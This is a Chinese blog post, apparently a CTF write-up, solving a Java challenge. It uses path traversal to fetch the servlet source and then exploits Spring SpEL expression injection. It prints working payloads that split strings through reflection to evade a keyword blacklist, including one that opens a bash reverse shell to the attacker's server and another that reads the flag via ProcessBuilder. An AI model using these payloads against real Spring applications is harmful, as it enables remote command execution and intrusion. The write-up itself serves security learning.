[JAVA安全分享]从第二届网刃杯CTF题目学习JAVA SPEL表达式注入

最新推荐文章于 2024-04-27 19:20:23 发布
最新推荐文章于 2024-04-27 19:20:23 发布
阅读量1.9k 收藏 4
点赞数 7
分类专栏: JAVA安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/124459611
版权

SPEL注入 命令执行 信息泄露 Spring框架 反射
关键词由CSDN通过智能技术生成

文章目录

前言

Spring 表达式语言(简称“SpEL”)是一种强大的表达式语言,支持在运行时查询和操作对象图。语言语法类似于 Unified EL,但提供了额外的功能,最值得注意的是方法调用和基本的字符串模板功能。

第二届网刃杯的一道java题目ez_java是一道涉及SPEL注入的入门题目,这里写一下解题思路以及对SPEL注入的学习。

一、信息泄露

打开题目靶机,看到一个下载文件的功能。
download
抓包发现可能存在任意文件下载
抓包
看看能不能目录穿越把web.xml下载下来,如果可以的话就能分析项目的路由,也可以把源码下载下来。
在这里插入图片描述看到了有两个class文件,一个是前面下载的功能,另一个用浏览器打开看看

test388
直接显示error,没有头绪,把它的源码下载下来看看。

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.abc.servlet;

import java.io.IOException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.expression.Expression;
import org.springframework.expression.ParserContext;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class TestServlet extends HttpServlet {
    public TestServlet() {
    }

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        this.doPost(req, resp);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        try {
            String name = request.getParameter("name");
            name = new String(name.getBytes("ISO8859-1"), "UTF-8");
            if (this.blackMatch(name)) {
                request.setAttribute("message", "name is invalid");
                request.getRequestDispatcher("/message.jsp").forward(request, response);
                return;
            }

            System.out.println(name);
            String message = this.getAdvanceValue(name);
            request.setAttribute("message", message);
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        } catch (Exception var5) {
            request.setAttribute("message", "error");
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        }

    }

    private boolean blackMatch(String val) {
        String[] var2 = this.getBlacklist();
        int var3 = var2.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            String keyword = var2[var4];
            Matcher matcher = Pattern.compile(keyword, 34).matcher(val);
            if (matcher.find()) {
                return true;
            }
        }

        return false;
    }

    private String getAdvanceValue(String val) {
        ParserContext parserContext = new TemplateParserContext();
        SpelExpressionParser parser = new SpelExpressionParser();
        Expression exp = parser.parseExpression(val, parserContext);
        StandardEvaluationContext evaluationContext = new StandardEvaluationContext();
        return exp.getValue(evaluationContext).toString();
    }

    private String[] getBlacklist() {
        return new String[]{"java.+lang", "Runtime", "exec.*\\("};
    }
}

二、SPEL表达式注入

首先看用到的依赖,有SPEL是我们这次的主角。
在这里插入图片描述
分析一下代码功能,当我们往页面发送GET请求或者POST请求的时候,会取得键为name的参数(get或者post过去的都可以)。
name接下来会使用黑名单取匹配一下这个name,如果匹配上了就会报错并且退出。绕过黑名单之后,会在下面调用getAdvanceValue,getAdvanceValue中用了getValue解析了SPEL表达式。
在这里插入图片描述
spEL表达式是可以操作类和方法的,可以通过类型表达式T(Type)来调用任意类方法,这里采用StandardEvaluationContext,而它包含了spEL的所有功能,在允许用户控制输入的情况下可以造成任意命令执行。
StandardEvaluationContext公开全套SpEL语言功能和配置选项。可以使用它来指定默认的根对象并配置每个可用的评估相关策略。

那我们直接把payload通过name参数传入就行。执行的语句用#{}包裹。
在这里插入图片描述

如果没有被过滤,直接取得Runtime对象,通过Runtime对象的exec来执行命令。

T(java.lang.Runtime).getRuntime().exec("calc")

但是黑名单过滤了一些关键字。
在这里插入图片描述在这里插入图片描述
我们可以通过反射来执行命令,这样就可以绕过黑名单。

#{T(String).getClass().forName("jav"+"a.la"+"ng.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("jav"+"a.la"+"ng.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).forName("jav"+"a.la"+"ng.Ru"+"ntime")),new String[]{"bash","-c","bash -i >& /dev/tcp/vps的ip/port 0>&1"})}

像上面这样,字符串可以分开再拼接,就可以绕过黑名单,这里直接就反弹shell。先url编码以下在打过去。
在这里插入图片描述在这里插入图片描述接受反弹shell成功,getshell成功!
在这里插入图片描述
获取flag
flag
如果靶机无法出网,那么我们的反弹shell就无法成功,但是只要SPEL显示在了页面上就可以把命令执行的结果显示出来。我们表达式的执行结果会当成字符串返回并显示在页面上,那么我们只要获取到命令执行的结果,返回String对象就可以了。因为Runtime执行命令无法获取结果,所以这里用到ProcessBuilder来执行命令。这样执行的命令执行结果可以获取。

#{new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /f1AgJvav"}).start().getInputStream(), "gbk")).readLine()}

flag2

总结

又学到了一个新姿势,很有意思的知识点,慢慢积累,慢慢进步。

Cgxx
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[Java安全]—SPEL表达式注入
Sentiment的博客
05-01 4130
前言 在前几天的网刃杯中,出了一道SPEL注入Java题,在复现后其实对于原理和内部流程还是不够了解,所以现在浅学一下。 配置 https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce,导入maven依赖 为了后期debug调试简便些,可以修改一下控制器 修改后运行,访问localhost:9091/article?id=${5*5},出现结果25则为配置成功 影响版本 Spr
Java安全(十四) CTF-Java题目复现
WDWAGAAFGAGDADSA的博客
05-04 2388
最近复现学习java题目
第十五届蓝桥杯网络安全赛项 ezjava writeup
最新发布
weixin_45936149的博客
04-27 862
第15届蓝桥杯ezjava writeup
从xxe到rce-记一道ctf中的java
灰太的表格的博客
04-02 1119
从xxe到rce-记一道ctf中的java
2023安洵杯 ezjava
qq_64201116的博客
03-18 838
主要就是这两个依赖,有一个CB,和一个postgresql​​postgresql可以看到有几个cve最熟悉的就是cve202221724这个了发现目标不出网,所以只能利用写文件的那个,刚好有一个ftl模板注入可以利用​接下来就是CB了,CB可以触发任意的getter,链子如下:​而且java的版本是。
CTF题为例,浅学一些JAVAweb项目相关知识
Welcome To MakaRi's Blog!
03-22 1767
本文更加偏重于学习题目有关的JAVA知识,而非解题思路,题目的解题与本文讲到的知识点大多无关。但是通过题目学习这些知识可以帮助理解JAVAweb服务和数据库连接的实现,知道了JAVA如何启动服务以及如何连接数据库,这是以后进行JAVA安全学习的前提和基础。本人大一,比较菜且基础薄弱,如有错误还望大佬指点。
CTF-web 第十三部分 命令注入
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
2022第二届网刃杯网络安全大赛题包
04-25
2022年第二届网刃杯网络安全大赛是一场专注于网络安全技术与实践的竞赛,旨在提升参赛者在网络防御、攻击检测、漏洞挖掘和应急响应等多方面的技能。此类比赛通常涵盖多种网络安全领域,包括但不限于密码学、网络嗅探...
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓越的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
【转】CTF各种加密算法解密集成(java,支持Python)
11-08
利用java编写的加解密集成工具,集成了凯撒,base64,html等多种编解码,加解密,支持自定义python脚本。CTF比赛实战工具,简明易用。
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
08-29
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
Java代码审计】SpEL表达式之命令执行
网络安全从业者的学习笔记
02-20 1110
Spring表达式语言全称为“Spring Expression Language”,缩写为“SpEL”。由Spring 3开始引入。不正确的使用SpEL表达式,则会导致命令执行漏洞。
CTF攻防赛java反编译题
qq_40872999的博客
09-10 2130
CTF攻防赛java反编译题Reverse.class已知Reverse.class文件 Reverse.class 已知Reverse.class文件 打开方式:idea,eclipse等java工具,记事本打开乱码 // // Source code recreated from a .class file by IntelliJ IDEA // (powered by Fernflower ...
Kali中文社区:java命令执行+waf绕过研究
superadminuser的博客
08-05 925
Kali中文社区:java命令执行+waf绕过研究原因简单说waf绕过常用命令执行函数最后总结一下 原因 今天在项目中,碰到了waf,本着学习研究的原则,刚好最近在学习java,就顺便研究java命令执行的东西。 简单说waf绕过 网上绕过的方法花里胡哨,这里就简单的说一下本人常用的绕过方法。 参数污染,主要是双写参数,或者对参数进行简单的变形,去除双引号等,主要是为了让waf无需检测这一类参数,或者根据操作系统特性,服务器特性进行绕过,这里感觉越来越难绕了就不多少。 垃圾数据填充,这一招能过的还是
Java pwn_CTF-Pwn-[BJDCTF 2nd]r2t4
weixin_30698721的博客
02-26 269
CTF-Pwn-[BJDCTF 2nd]r2t4博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd]r2t4下载题目的文件r2t4思路使用file命令查看,发现是64位的文件,使用ida64...
CTF题目,常用的网站汇总(持续更新)
羽的博客
02-21 4720
0X01 base解密 http://www.nicetool.net/tag/base/ 0X02 各种码的识别 https://demo.dynamsoft.com/DBR/BarcodeReaderDemo.aspx 0X03 各种奇怪的加密(花瓣加密,音乐符号加密。。。) https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue 0X04...
CTF入门
热门推荐
chaoyueziji123的专栏
09-28 5万+
感谢白帽子ADoG A.K.A D3AdCa7 (死猫&霸道总裁)同学的投稿,以下内容供安全爱好者参考学习,本文获得投稿奖励300元,即将打入作者账户,投稿请发送邮件至 huangyuan#360.cn 序 信息安全作为国家越来越重视的领域已经在渐渐起飞,而CTF(Capture the flag)作为信息安全领域选拔人才和互相比拼技能水平的比赛形式,也被越来越多的人所关注,那么作为一
2022网刃杯ctf
10-17
2022网刃杯CTF是一场面向信息安全爱好者的竞技赛,旨在测试参与者在网络安全领域的技术水平和解决问题的能力。CTF是Capture The Flag的缩写,意指夺旗赛。比赛中,参与者需要根据给定的情景和任务,通过寻找和利用漏洞获得各种加密标记,即旗帜,以证明攻击并取得成功。 2022网刃杯CTF为参与者提供了一个良好的平台,帮助他们提升对网络安全的认知和技能,更好地理解网络攻防的原理和方法。参赛者将面对各种类型的题目,例如逆向工程、密码学、Web安全、二进制攻防等,需要通过解决这些题目来获取旗帜。 除了对技术水平的要求,参赛者还需要具备良好的团队协作能力,因为很多题目需要进行合作解决。此外,比赛还会设置一些线下考核,通过面对面交流和互动,增加了比赛的趣味性和挑战性。 参与2022网刃杯CTF对于从事信息安全相关工作的人来说是一次很好的学习和锻炼机会。通过参与这样的比赛,他们能够不断学习和掌握最新的网络攻防技术,提高自己的技术水平和解决问题的能力。同时,比赛还能够帮助建立更广泛的人脉,与其他安全领域的专家和爱好者交流和讨论,拓宽自己的眼界。 总而言之,2022网刃杯CTF是一次非常有意义和有益的比赛活动,它能够帮助参与者提升自己在网络安全领域的技术水平和解决问题的能力,并且通过比赛的方式增强团队合作和交流能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值